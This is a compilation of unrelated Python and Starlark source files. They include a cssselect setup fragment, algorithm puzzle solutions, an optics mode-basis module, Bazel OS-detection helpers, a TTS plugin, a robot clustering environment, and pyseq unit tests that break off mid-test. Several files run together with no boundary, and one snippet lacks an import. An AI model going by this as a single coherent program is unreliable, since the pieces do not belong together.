    author='Ian Bicking',
    author_email='ianb@colorstudy.com',
    maintainer='Simon Sapin',
    maintainer_email='simon.sapin@exyr.org',
    description=
        'cssselect parses CSS3 Selectors and translates them to XPath 1.0',
    long_description=README,
    url='http://packages.python.org/cssselect/',
    license='BSD',
    packages=['cssselect'],
    classifiers=[
        'Development Status :: 4 - Beta',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: BSD License',
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.4',
        'Programming Language :: Python :: 2.5',
        'Programming Language :: Python :: 2.6',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.1',
        'Programming Language :: Python :: 3.2',
    ],
    **extra_kwargs
)
|
# Convert BST to Doubly Linked List
# the left and right pointers in nodes are to be used as prev and next pointers
# respectively in converted DLL, do it in place
def bst_to_dll(root):
    """Convert a BST to a sorted doubly linked list in place; return its head."""
    head, _tail = inorder(root)
    return head
def inorder(root):
    """Recursively rewire the subtree at root into a DLL; return (head, tail).

    The node's left/right pointers become the DLL's prev/next pointers.
    """
    if not root:
        return (None, None)
    # Convert both subtrees first; mutations below touch disjoint nodes
    left_head, left_tail = inorder(root.left)
    right_head, right_tail = inorder(root.right)
    # Splice the left list's tail just before root
    if left_head:
        left_tail.right = root
        root.left = left_tail
    # Splice the right list's head just after root
    if right_head:
        root.right = right_head
        right_head.left = root
    head = left_head if left_head else root
    tail = right_tail if right_head else root
    return head, tail
def pprint(root):
    """Print the list's values from head to tail, one per line."""
    # print as a function: the original `print root.val` statement is a
    # syntax error on Python 3; the call form works on both 2 and 3.
    while root:
        print(root.val)
        root = root.right
def test():
    """Build a small BST, convert it, and print the resulting list in order."""
    # Tree shape:      3
    #                /   \
    #               1     5
    #              / \   /
    #             0   2 4
    nodes = [TreeNode(value) for value in range(6)]
    nodes[3].left, nodes[3].right = nodes[1], nodes[5]
    nodes[1].left, nodes[1].right = nodes[0], nodes[2]
    nodes[5].left = nodes[4]
    bst_to_dll(nodes[3])
    pprint(nodes[0])
class TreeNode(object):
    """A binary tree node holding a value and left/right child links."""
    def __init__(self, val):
        self.val = val
        self.left = self.right = None
if __name__ == '__main__':
    # Run the smoke test when executed directly
    test()
|
import numpy as np
from math import sqrt, floor
from scipy.special import eval_genlaguerre
def gaussian_laguerre(p, l, mode_field_diameter=1, grid=None):
    r'''Creates a Gaussian-Laguerre mode.

    This function evaluates a (p,l) order Gaussian-Laguerre mode on a grid.
    The definition of the modes are the following,
    .. math::
        \exp{\left(-\frac{r^2}{w_0^2}\right)} L_p^{|l|}\left(\frac{2r^2}{w_0^2} \right) \left(\sqrt{2}\frac{r}{w_0}\right)
    Here :math:`w_0` is the mode_field_radius, which is :math:`\mathrm{MFD}/2`.
    And :math:`L_p^{|l|}` are the generalized Laguerre Polynomials.
    All modes are numerically normalized to have a total power of 1.
    More details on generalized Laguerre Polynomials can be found on:
    http://mathworld.wolfram.com/AssociatedLaguerrePolynomial.html

    Parameters
    ----------
    p : int
        The radial order.
    l : int
        The azimuthal order.
    mode_field_diameter : scalar
        The mode field diameter of the mode.
    grid : Grid
        The grid on which to evaluate the mode. Must not be None.

    Returns
    -------
    Field
        The evaluated mode.
    '''
    from ..field import Field
    # Use the cheaper separated polar coordinates when the grid provides them
    if grid.is_separated and grid.is_('polar'):
        R, Theta = grid.separated_coords
    else:
        R, Theta = grid.as_('polar').coords
    # Normalized radial coordinate: r = R / w_0 = 2 R / MFD
    r = 2 * R / mode_field_diameter
    r2 = r**2
    # Gaussian envelope * azimuthal phase * generalized Laguerre polynomial
    lg = (r * sqrt(2))**(abs(l)) * np.exp(-r2) * np.exp(-1j * l * Theta) * eval_genlaguerre(p, abs(l), 2 * r2)
    # Numerically normalize to unit total power: the amplitude must be divided
    # by the SQUARE ROOT of the power integral (dividing by the integral itself,
    # as before, does not yield unit power).
    lg /= np.sqrt(np.sum(np.abs(lg)**2 * grid.weights))
    return Field(lg, grid)
# High level functions
def make_gaussian_laguerre_basis(grid, pmax, lmax, mode_field_diameter, pmin=0):
    '''Creates a Gaussian-Laguerre mode basis.

    Evaluates Gaussian-Laguerre modes for every azimuthal order in
    [-lmax, lmax] inclusive, and for each of those, every radial order in
    [pmin, pmax), and collects them into a ModeBasis.

    Parameters
    ----------
    grid : Grid
        The grid on which to evaluate the Gaussian-Laguerre mode.
    pmax : int
        The maximum radial order of the modes.
    lmax : int
        The maximum azimuthal order.
    mode_field_diameter : scalar
        The mode field diameter of the Gaussian-Laguerre mode.
    pmin : int
        The minimal radial order.

    Returns
    -------
    ModeBasis
        The Gaussian-Laguerre modes.
    '''
    from .mode_basis import ModeBasis
    # Keep the ordering identical to the original comprehension:
    # azimuthal order varies in the outer loop, radial order in the inner one.
    modes = []
    for azimuthal_order in range(-lmax, lmax + 1):
        for radial_order in range(pmin, pmax):
            modes.append(gaussian_laguerre(radial_order, azimuthal_order, mode_field_diameter, grid))
    return ModeBasis(modes)
class MarbleDecoration:
    """Longest strictly-alternating two-color sequence from marble counts."""
    def maxLength(self, R, G, B):
        def pair_length(x, y):
            # Alternating run of two colors: 2*min+1 when the counts differ
            # (the larger color supplies both ends), 2*min when equal.
            if x == y:
                return x + y
            return 2 * min(x, y) + 1
        best = pair_length(R, G)
        best = max(best, pair_length(R, B))
        best = max(best, pair_length(G, B))
        return best
|
load(":execute.bzl", "which")
def exec_using_which(repository_ctx, command):
    """Run the given command (a list), using the which() function in
    execute.bzl to locate the executable named by the zeroth index of
    `command`.
    Return struct with attributes:
    - error (None when success, or else str message)
    - stdout (str command output, possibly empty)
    """
    # Locate the executable on the PATH.
    exe_path = which(repository_ctx, command[0])
    if exe_path == None:
        return struct(
            stdout = "",
            error = "could not find which '%s'" % command[0],
        )

    # Run it and report success or a detailed failure message.
    exec_result = repository_ctx.execute([exe_path] + command[1:])
    if exec_result.return_code == 0:
        return struct(stdout = exec_result.stdout, error = None)
    message = "error %d running %r (command %r, stdout %r, stderr %r)" % (
        exec_result.return_code,
        command[0],
        command,
        exec_result.stdout,
        exec_result.stderr,
    )
    return struct(stdout = exec_result.stdout, error = message)
def _make_result(
        error = None,
        ubuntu_release = None,
        macos_release = None):
    """Return a fully-populated struct result for determine_os, below."""
    # Derive the distribution name from whichever release was supplied.
    distribution = None
    if ubuntu_release != None:
        distribution = "ubuntu"
    elif macos_release != None:
        distribution = "macos"
    return struct(
        error = error,
        distribution = distribution,
        is_macos = (macos_release != None),
        is_ubuntu = (ubuntu_release != None),
        ubuntu_release = ubuntu_release,
        macos_release = macos_release,
    )
def _determine_linux(repository_ctx):
    """Handle determine_os on Linux.

    Reads /etc/os-release to identify the distribution, and returns a
    _make_result struct (with `error` set when unsupported or unreadable).
    """

    # Shared error message text across different failure cases.
    error_prologue = "could not determine Linux distribution: "

    # Run sed to determine Linux NAME and VERSION_ID.  The sed program prints
    # only the values (with surrounding quotes stripped) of the NAME= and
    # VERSION_ID= lines.
    sed = exec_using_which(repository_ctx, [
        "sed",
        "-n",
        "/^\(NAME\|VERSION_ID\)=/{s/[^=]*=//;s/\"//g;p}",
        "/etc/os-release",
    ])
    if sed.error != None:
        return _make_result(error = error_prologue + sed.error)

    # Compute an identifying string, in the form of "$NAME $VERSION_ID".
    lines = [line.strip() for line in sed.stdout.strip().split("\n")]
    distro = " ".join([x for x in lines if len(x) > 0])

    # Match supported Ubuntu release(s). These should match those listed in
    # both doc/developers.rst the root CMakeLists.txt.
    for ubuntu_release in ["16.04", "18.04"]:
        if distro == "Ubuntu " + ubuntu_release:
            return _make_result(ubuntu_release = ubuntu_release)

    # Nothing matched.
    return _make_result(
        error = error_prologue + "unsupported distribution '%s'" % distro,
    )
def _determine_macos(repository_ctx):
    """Handle determine_os on macOS.

    Runs `sw_vers -productVersion` and matches the "major.minor" prefix of
    the reported version against the supported macOS releases.
    """
    # Shared error message text across different failure cases.
    error_prologue = "could not determine macOS version: "

    # Ask the OS for its product version (e.g. "10.14.2").
    result = exec_using_which(repository_ctx, [
        "sw_vers",
        "-productVersion",
    ])
    if result.error != None:
        return _make_result(error = error_prologue + result.error)

    # Keep only the "major.minor" portion of the reported version string.
    macos_release = ".".join(result.stdout.strip().split(".")[:2])

    # Match supported macOS release(s).
    for supported in ["10.13", "10.14"]:
        if macos_release == supported:
            return _make_result(macos_release = macos_release)

    # Nothing matched.
    return _make_result(
        error = error_prologue + "unsupported macOS '%s'" % macos_release,
    )
def determine_os(repository_ctx):
    """
    A repository_rule helper function that determines which of the supported OS
    versions we are targeting.

    Argument:
        repository_ctx: The context passed to the repository_rule calling this.

    Result:
        a struct, with attributes:
        - error: str iff any error occurred, else None
        - distribution: str either "ubuntu" or "macos" if no error
        - is_macos: True iff on a supported macOS release, else False
        - macos_release: str like "10.14" iff on a supported macOS, else None
        - is_ubuntu: True iff on a supported Ubuntu version, else False
        - ubuntu_release: str like "16.04" iff on a supported ubuntu, else None
    """
    # Dispatch on the reported OS name; anything unrecognised is an error.
    handlers = {
        "mac os x": _determine_macos,
        "linux": _determine_linux,
    }
    os_name = repository_ctx.os.name
    handler = handlers.get(os_name)
    if handler == None:
        return _make_result(error = "unknown or unsupported OS '%s'" % os_name)
    return handler(repository_ctx)
|
# TTS plugin for silero engine
# author: Vladislav Janvarev
# require torch 1.10+
import os
from vacore import VACore
modname = os.path.basename(__file__)[:-3]  # plugin module name: this file's basename without the ".py" suffix
# функция на старте
def start(core:VACore):
    """Plugin entry point: return the manifest describing this TTS engine.

    The "tts" entry registers the engine under the id "silero_v3" as a tuple
    of (init function, direct-speak function, render-to-wav-file function);
    direct speaking is not supported, hence the None in the middle slot.
    """
    return {
        "name": "TTS silero V3",
        "version": "1.2",
        "require_online": False,

        "default_options": {
            "speaker": "xenia",
            "threads": 4,
            "sample_rate": 24000,
            "put_accent": True,
            "put_yo": True,
        },

        "tts": {
            "silero_v3": (init, None, towavfile)
        }
    }
def start_with_options(core:VACore, manifest:dict):
    # Intentionally empty: this plugin needs no option-dependent setup.
    pass
def init(core:VACore):
    """One-time engine setup: load the silero ru_v3 model onto the CPU.

    Downloads the packaged model file on first use, then stores the loaded
    torch model on `core.model` for towavfile() to render with.
    """
    options = core.plugin_options(modname)

    import os
    import torch

    device = torch.device('cpu')
    torch.set_num_threads(options["threads"])
    local_file = 'ru_v3.pt'

    # Fetch the model file only when it is not already cached locally.
    if not os.path.isfile(local_file):
        torch.hub.download_url_to_file('https://models.silero.ai/models/tts/ru/ru_v3.pt',
                                       local_file)

    core.model = torch.package.PackageImporter(local_file).load_pickle("tts_models", "model")
    core.model.to(device)
def towavfile(core:VACore, text_to_speech:str, wavfile:str):
    """Render `text_to_speech` with the loaded silero model into `wavfile`.

    :param core: VACore instance; must already hold the model set by init().
    :param text_to_speech: text to synthesise.
    :param wavfile: destination path for the rendered wav file.
    """
    # The model does not handle the single-character ellipsis.
    text_to_speech = text_to_speech.replace("…","...")
    # Spell numbers out as words before synthesis.
    text_to_speech = core.all_num_to_text(text_to_speech)

    options = core.plugin_options(modname)
    speaker = options["speaker"]

    # Render the wav; the model chooses the temporary output path.
    path = core.model.save_wav(text=text_to_speech,
                               speaker=speaker,
                               put_accent=options["put_accent"],
                               put_yo=options["put_yo"],
                               sample_rate=options["sample_rate"])

    # Move the rendered file into place.  os.replace overwrites an existing
    # destination in a single call, avoiding the check/unlink/rename race of
    # the previous implementation (exists() + unlink() + rename()).
    os.replace(path, wavfile)
class Solution:
    def minSubArrayLen(self, s: int, nums: List[int]) -> int:
        """Return the length of the shortest contiguous subarray of `nums`
        whose sum is at least `s`, or 0 when no such subarray exists.

        Sliding-window: grow the window on the right, then shrink from the
        left while the window sum still meets the target.
        """
        best = float('inf')
        window_sum = 0
        left = 0
        for right, value in enumerate(nums):
            window_sum += value
            # Shrink while the window still satisfies the target sum.
            while window_sum >= s:
                best = min(best, right - left + 1)
                window_sum -= nums[left]
                left += 1
        return 0 if best == float('inf') else best
import abc
import enum
from gym.utils import EzPickle
import numpy as np
from magical.base_env import BaseEnv, ez_init
import magical.entities as en
import magical.geom as geom
class BaseClusterEnv(BaseEnv, abc.ABC):
    """There are blocks of many colours and types. You must arrange them into
    distinct clusters. Depending on the demo, cluster membership must either be
    determined by shape type or shape colour (but if it's determined by one
    characteristic in the demo then it should be independent of the other
    characteristic). There should be exactly one cluster for each value of the
    membership characteristic (e.g. if clustering on colour, there should be
    one blue cluster, one red cluster, etc.).

    This class should not be instantiated directly. Instead, you should use
    ClusterColourEnv or ClusterShapeEnv."""

    class ClusterBy(str, enum.Enum):
        """What characteristic should blocks be clustered by?"""
        COLOUR = 'colour'
        TYPE = 'type'
        # TODO: add a 'both' option! (will require another demo scenario)

    def __init__(
            self,
            # should we randomise assignment of colours to blocks, or use
            # default ordering?
            rand_shape_colour=False,
            # should we randomise assignment of types to blocks, or use default
            # ordering?
            rand_shape_type=False,
            # should we jitter the positions of blocks and the robot?
            rand_layout_minor=False,
            # should we fully randomise the positions of blocks and the robot?
            rand_layout_full=False,
            # should we randomise number of blocks? (this requires us to
            # randomise everything else, too)
            rand_shape_count=False,
            # which block characteristic do we want the user to pay attention
            # to for clustering? (colour vs. shape type)
            cluster_by=ClusterBy.COLOUR,
            **kwargs):
        """Store the randomisation flags and validate their dependencies."""
        super().__init__(**kwargs)
        self.rand_shape_colour = rand_shape_colour
        self.rand_shape_type = rand_shape_type
        self.rand_shape_count = rand_shape_count
        # minor jitter and full randomisation are mutually exclusive
        assert not (rand_layout_minor and rand_layout_full)
        self.rand_layout_minor = rand_layout_minor
        self.rand_layout_full = rand_layout_full
        self.cluster_by = cluster_by
        if self.rand_shape_count:
            assert self.rand_layout_full, \
                "if shape count is randomised then layout must also be " \
                "fully randomised"
            assert self.rand_shape_type, \
                "if shape count is randomised then shape type must also be " \
                "randomised"
            assert self.rand_shape_colour, \
                "if shape count is randomised then colour must be " \
                "randomised too"

    def on_reset(self):
        """Build the scene for an episode: robot, blocks (colours/types/poses
        possibly randomised per the constructor flags), and the
        characteristic->blocks index used later by score_on_end_of_traj()."""
        # make the robot at default position (will be randomised at end if
        # rand_layout is true)
        robot = self._make_robot(*self.DEFAULT_ROBOT_POSE)

        # 3x blue & 2x of each other colour
        default_colours = self.DEFAULT_BLOCK_COLOURS
        # 3x pentagon & 2x of each other shape type
        default_shape_types = self.DEFAULT_BLOCK_SHAPES
        # these were generated by randomly scattering shapes about the chosen
        # default robot position and then rounding down values a bit
        default_poses = self.DEFAULT_BLOCK_POSES
        default_n_shapes = len(default_colours)

        if self.rand_shape_count:
            n_shapes = self.rng.randint(7, 10 + 1)
            # rand_shape_count=True implies rand_layout=True, so these MUST be
            # randomised at the end
            poses = [((0, 0), 0)] * n_shapes
        else:
            n_shapes = default_n_shapes
            # if rand_layout=True, these will be randomised at the end
            poses = default_poses

        if self.rand_shape_colour:
            # make sure we have at least one of each colour
            colours = list(en.SHAPE_COLOURS)
            colours.extend([
                self.rng.choice(en.SHAPE_COLOURS)
                for _ in range(n_shapes - len(colours))
            ])
            self.rng.shuffle(colours)
        else:
            colours = default_colours

        if self.rand_shape_type:
            # make sure we have at least one of each type, too
            shape_types = list(en.SHAPE_TYPES)
            shape_types.extend([
                self.rng.choice(en.SHAPE_TYPES)
                for _ in range(n_shapes - len(shape_types))
            ])
            self.rng.shuffle(shape_types)
        else:
            shape_types = default_shape_types

        assert len(poses) == n_shapes
        assert len(colours) == n_shapes
        assert len(shape_types) == n_shapes

        shape_ents = []
        for ((x, y), angle), colour, shape_type \
                in zip(poses, colours, shape_types):
            shape = self._make_shape(shape_type=shape_type,
                                     colour_name=colour,
                                     init_pos=(x, y),
                                     init_angle=angle)
            shape_ents.append(shape)
        self.add_entities(shape_ents)

        # make index mapping characteristic values to blocks
        if self.cluster_by == self.ClusterBy.COLOUR:
            c_values_list = np.asarray(colours, dtype='object')
            self.__characteristic_values = np.unique(c_values_list)
        elif self.cluster_by == self.ClusterBy.TYPE:
            c_values_list = np.asarray(shape_types, dtype='object')
            self.__characteristic_values = np.unique(c_values_list)
        else:
            raise NotImplementedError(
                f"don't know how to cluster by '{self.cluster_by}'")
        self.__blocks_by_characteristic = {}
        assert len(c_values_list) == len(shape_ents)
        for shape, c_value in zip(shape_ents, c_values_list):
            c_list = self.__blocks_by_characteristic.setdefault(c_value, [])
            c_list.append(shape)

        # as in match_regions.py, this should be added after all shapes so it
        # appears on top, but before layout randomisation so that it gets added
        # to the space correctly
        self.add_entities([robot])

        if self.rand_layout_full or self.rand_layout_minor:
            if self.rand_layout_full:
                pos_limit = rot_limit = None
            else:
                pos_limit = self.JITTER_POS_BOUND
                rot_limit = self.JITTER_ROT_BOUND
            geom.pm_randomise_all_poses(space=self._space,
                                        entities=[robot, *shape_ents],
                                        arena_lrbt=self.ARENA_BOUNDS_LRBT,
                                        rng=self.rng,
                                        rand_pos=True,
                                        rand_rot=True,
                                        rel_pos_linf_limits=pos_limit,
                                        rel_rot_limits=rot_limit)

        # set up index for lookups
        self.__ent_index = en.EntityIndex(shape_ents)

    def score_on_end_of_traj(self):
        """Return a score in [0, 1] measuring how tightly blocks are grouped
        into one cluster per characteristic value at the end of an episode."""
        # Compute centroids for each value of the relevant characteristic
        # (either colour or shape type). Also compute mean squared distance
        # from centroid for each block in the cluster.
        nvals = len(self.__characteristic_values)
        centroids = np.zeros((nvals, 2))
        for c_idx, c_value in enumerate(self.__characteristic_values):
            c_blocks = self.__blocks_by_characteristic.get(c_value)
            if not c_blocks:
                centroid = (0, 0)
            else:
                positions = np.asarray([(b.shape_body.position.x,
                                         b.shape_body.position.y)
                                        for b in c_blocks])
                centroid = np.mean(positions, axis=0)
            centroids[c_idx] = centroid

        # Now for each block compute whether squared distance to nearest
        # incorrect centroid. A block is correctly clustered if the true
        # centroid is closer than the next-nearest centroid by a margin of at
        # least min_margin * (mean variation within true centroid). This
        # rewards tight clusterings.
        min_margin = 2.0  # higher = more strict
        n_blocks = 0
        n_correct = 0
        for c_idx, c_value in enumerate(self.__characteristic_values):
            for block in self.__blocks_by_characteristic.get(c_value, []):
                n_blocks += 1
                block_pos = np.array([[
                    block.shape_body.position.x,
                    block.shape_body.position.y,
                ]])
                centroid_sses = np.sum((block_pos - centroids)**2, axis=1)
                indices = np.arange(len(self.__characteristic_values))
                true_sse, = centroid_sses[indices == c_idx]
                bad_sses = centroid_sses[indices != c_idx]
                nearest_bad_centroid = np.min(bad_sses)
                true_centroid_sse = centroid_sses[c_idx]
                # NOTE(review): true_centroid_sse always equals true_sse (both
                # select the c_idx entry), so the margin comes from this
                # block's own squared distance to its centroid, not from a
                # cluster-wide variation as the comment above suggests; the
                # margin is also in squared units while the comparison below
                # is between square roots — confirm the unit mix is intended.
                margin = min_margin * true_centroid_sse
                n_correct += int(
                    np.sqrt(true_sse) < np.sqrt(nearest_bad_centroid) - margin)

        # rescale so that frac_correct <= thresh gives 0 score, frac_correct ==
        # 1.0 gives 1 score. I've found it's common to frac_correct ranging
        # from 0.2 up to 0.4 just from random init; this clipping process means
        # that random init gives close to 0 average score.
        frac_correct = float(n_correct) / max(n_blocks, 1)
        thresh = 0.75
        score = max(frac_correct - thresh, 0) / (1 - thresh)
        return score
class ClusterColourEnv(BaseClusterEnv, EzPickle):
    """Cluster variant in which block membership is determined by colour."""

    # Default (non-randomised) scene layout matching the recorded demo:
    # robot pose, per-block colours, per-block shape types, and block poses.
    DEFAULT_ROBOT_POSE = ((0.71692, -0.34374), 0.83693)
    DEFAULT_BLOCK_COLOURS = [
        en.ShapeColour.BLUE,
        en.ShapeColour.BLUE,
        en.ShapeColour.BLUE,
        en.ShapeColour.GREEN,
        en.ShapeColour.GREEN,
        en.ShapeColour.RED,
        en.ShapeColour.YELLOW,
        en.ShapeColour.YELLOW,
    ]
    DEFAULT_BLOCK_SHAPES = [
        en.ShapeType.CIRCLE,
        en.ShapeType.STAR,
        en.ShapeType.SQUARE,
        en.ShapeType.PENTAGON,
        en.ShapeType.PENTAGON,
        en.ShapeType.SQUARE,
        en.ShapeType.STAR,
        en.ShapeType.PENTAGON,
    ]
    # ((x, y), angle) tuples, one per block, aligned with the lists above.
    DEFAULT_BLOCK_POSES = [
        ((-0.5147, 0.14149), -0.38871),
        ((-0.1347, -0.71414), 1.0533),
        ((-0.74247, -0.097592), 1.1571),
        ((-0.077363, -0.42964), -0.64379),
        ((0.51978, 0.1853), -1.1762),
        ((-0.5278, -0.21642), 2.9356),
        ((-0.54039, 0.48292), 0.072818),
        ((-0.16761, 0.64303), -2.3255),
    ]

    @ez_init()
    def __init__(self, *args, **kwargs):
        """Force clustering by colour; all other arguments pass through."""
        super().__init__(*args,
                         cluster_by=BaseClusterEnv.ClusterBy.COLOUR,
                         **kwargs)
class ClusterShapeEnv(BaseClusterEnv, EzPickle):
    """Cluster variant in which block membership is determined by shape type."""

    # demo variant
    # Default (non-randomised) scene layout matching the recorded demo:
    # robot pose, per-block colours, per-block shape types, and block poses.
    DEFAULT_ROBOT_POSE = ((0.286, -0.202), -1.878)
    DEFAULT_BLOCK_COLOURS = [
        en.ShapeColour.YELLOW,
        en.ShapeColour.BLUE,
        en.ShapeColour.RED,
        en.ShapeColour.RED,
        en.ShapeColour.GREEN,
        en.ShapeColour.YELLOW,
        en.ShapeColour.BLUE,
        en.ShapeColour.GREEN,
    ]
    DEFAULT_BLOCK_SHAPES = [
        en.ShapeType.SQUARE,
        en.ShapeType.PENTAGON,
        en.ShapeType.PENTAGON,
        en.ShapeType.PENTAGON,
        en.ShapeType.CIRCLE,
        en.ShapeType.STAR,
        en.ShapeType.STAR,
        en.ShapeType.CIRCLE,
    ]
    # ((x, y), angle) tuples, one per block, aligned with the lists above.
    DEFAULT_BLOCK_POSES = [
        ((-0.414, 0.297), -1.731),
        ((0.068, 0.705), 2.184),
        ((0.821, 0.220), 0.650),
        ((-0.461, -0.749), -2.673),
        ((0.867, -0.149), -2.215),
        ((-0.785, -0.140), -0.405),
        ((-0.305, -0.226), 1.341),
        ((0.758, -0.708), -2.140),
    ]

    @ez_init()
    def __init__(self, *args, **kwargs):
        """Force clustering by shape type; all other arguments pass through."""
        super().__init__(*args,
                         cluster_by=BaseClusterEnv.ClusterBy.TYPE,
                         **kwargs)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# ---------------------------------------------------------------------------------------------
# Copyright (c) 2011-2015, Ryan Galloway (ryan@rsgalloway.com)
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# - Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# - Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# - Neither the name of the software nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# -----------------------------------------------------------------------------
import os
import re
import random
import unittest
import subprocess
import sys
# Make the pyseq package (one directory up from this test file) importable
# when the tests are run directly from the tests directory.
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from pyseq import Item, Sequence, diff, uncompress, get_sequences
from pyseq import SequenceError
import pyseq

# Use the compact "<head><range><tail>" form for Sequence string output in
# every test below.
pyseq.default_format = '%h%r%t'
class ItemTestCase(unittest.TestCase):
    """tests the Item class
    """

    def setUp(self):
        """set up the test
        """
        # platform-independent absolute path to one frame of a file sequence
        self.test_path =\
            os.path.abspath(os.path.join(os.sep,'mnt', 'S', 'Some','Path','to','a','file','with','numbers','file.0010.exr'))

    def test_initializing_with_a_string(self):
        """testing if initializing an Item with a string showing the path of a
        file is working properly
        """
        i = Item(self.test_path)
        self.assertTrue(isinstance(i, Item))

    def test_path_attribute_is_working_properly(self):
        """testing if the path attribute is working properly
        """
        i = Item(self.test_path)
        self.assertEqual(
            self.test_path,
            i.path
        )

    def test_path_attribute_is_read_only(self):
        """testing if the path attribute is read only
        """
        i = Item(self.test_path)
        with self.assertRaises(AttributeError) as cm:
            setattr(i, 'path', 'some value')

        # NOTE(review): CPython 3.11+ reports a different message, e.g.
        # "property 'path' of 'Item' object has no setter"; the exact-string
        # comparisons in this and the other *_read_only tests below are
        # version-fragile — confirm the Python versions being targeted.
        self.assertEqual(
            str(cm.exception),
            "can't set attribute"
        )

    def test_name_attribute_is_working_properly(self):
        """testing if the name attribute is working properly
        """
        i = Item(self.test_path)
        self.assertEqual(
            i.name,
            'file.0010.exr'
        )

    def test_name_attribute_is_read_only(self):
        """testing if the name attribute is read only
        """
        i = Item(self.test_path)
        with self.assertRaises(AttributeError) as cm:
            setattr(i, 'name', 'some value')

        self.assertEqual(
            str(cm.exception),
            "can't set attribute"
        )

    def test_dirname_attribute_is_working_properly(self):
        """testing if the dirname attribute is working properly
        """
        i = Item(self.test_path)
        self.assertEqual(
            i.dirname,
            os.path.dirname(self.test_path)
        )

    def test_dirname_attribute_is_read_only(self):
        """testing if the dirname attribute is read only
        """
        i = Item(self.test_path)
        with self.assertRaises(AttributeError) as cm:
            setattr(i, 'dirname', 'some value')

        self.assertEqual(
            str(cm.exception),
            "can't set attribute"
        )

    def test_digits_attribute_is_working_properly(self):
        """testing if the digits attribute is working properly
        """
        i = Item(self.test_path)
        self.assertEqual(
            i.digits,
            ['0010']
        )

    def test_digits_attribute_is_read_only(self):
        """testing if the digits attribute is read only
        """
        i = Item(self.test_path)
        with self.assertRaises(AttributeError) as cm:
            setattr(i, 'digits', 'some value')

        self.assertEqual(
            str(cm.exception),
            "can't set attribute"
        )

    def test_parts_attribute_is_working_properly(self):
        """testing if the parts attribute is working properly
        """
        i = Item(self.test_path)
        self.assertEqual(
            i.parts,
            ['file.', '.exr']
        )

    def test_parts_attribute_is_read_only(self):
        """testing if the parts attribute is read only
        """
        i = Item(self.test_path)
        with self.assertRaises(AttributeError) as cm:
            setattr(i, 'parts', 'some value')

        self.assertEqual(
            str(cm.exception),
            "can't set attribute"
        )

    def test_is_sibling_method_is_working_properly(self):
        """testing if the is_sibling() is working properly
        """
        item1 = Item('/mnt/S/Some/Path/to/a/file/with/numbers/file.0010.exr')
        item2 = Item('/mnt/S/Some/Path/to/a/file/with/numbers/file.0101.exr')
        # sibling-ness must be symmetric
        self.assertTrue(item1.is_sibling(item2))
        self.assertTrue(item2.is_sibling(item1))
class SequenceTestCase(unittest.TestCase):
    """tests the pyseq Sequence class
    """

    def setUp(self):
        """set the test up
        """
        self.files = ['file.0001.jpg', 'file.0002.jpg', 'file.0003.jpg']

    def test_from_list(self):
        """testing if Sequence instance can be initialized with a list of file
        names
        """
        seq = Sequence(self.files)
        self.assertEqual(
            str(seq),
            'file.1-3.jpg'
        )

    def test_appending_a_new_file(self):
        """testing if it is possible to append a new item to the list by giving
        the file name
        """
        seq = Sequence(self.files)
        test_file = 'file.0006.jpg'
        seq.append(test_file)
        self.assertTrue(
            seq.contains('file.0005.jpg')
        )
        self.assertTrue(
            seq.contains(test_file)
        )
        self.assertFalse(
            seq.contains('file.0015.jpg')
        )

    def test___setitem__(self):
        """replacing an item keeps sequence membership; a non-member raises"""
        s = Sequence(["file.01.ext", "file.05.ext"])
        s[1] = "file.02.ext"
        self.assertEqual(len(s), 2)
        self.assertEqual(s[0], Item("file.01.ext"))
        self.assertEqual(s[1], Item("file.02.ext"))
        self.assertRaises(SequenceError, s.__setitem__, 0, "item.1.ext")

    def test___add__(self):
        """adding an Item, name, list or Sequence returns a new Sequence and
        leaves the original untouched"""
        s = Sequence(["file.01.ext"])

        ns = s + Item("file.02.ext")
        self.assertEqual(len(ns), 2)
        self.assertEqual(ns[0], s[0])
        self.assertEqual(ns[1], Item("file.02.ext"))
        self.assertEqual(len(s), 1)

        ns = s + "file.02.ext"
        self.assertEqual(len(ns), 2)
        self.assertEqual(ns[0], s[0])
        self.assertEqual(ns[1], Item("file.02.ext"))
        self.assertEqual(len(s), 1)

        ns = s + ["file.02.ext"]
        self.assertEqual(len(ns), 2)
        self.assertEqual(ns[0], s[0])
        self.assertEqual(ns[1], Item("file.02.ext"))
        self.assertEqual(len(s), 1)

        ns = s + Sequence(["file.02.ext"])
        self.assertEqual(len(ns), 2)
        self.assertEqual(ns[0], s[0])
        self.assertEqual(ns[1], Item("file.02.ext"))
        self.assertEqual(len(s), 1)

        self.assertRaises(SequenceError, s.__add__, "item.01.ext")
        self.assertRaises(TypeError, s.__add__, 1)

    def test___iadd__(self):
        """in-place addition accepts an Item, name, list or Sequence"""
        s = Sequence(["file.01.ext"])
        s += Item("file.02.ext")
        self.assertEqual(len(s), 2)
        self.assertEqual(s[0], s[0])
        self.assertEqual(s[1], Item("file.02.ext"))

        s = Sequence(["file.01.ext"])
        s += "file.02.ext"
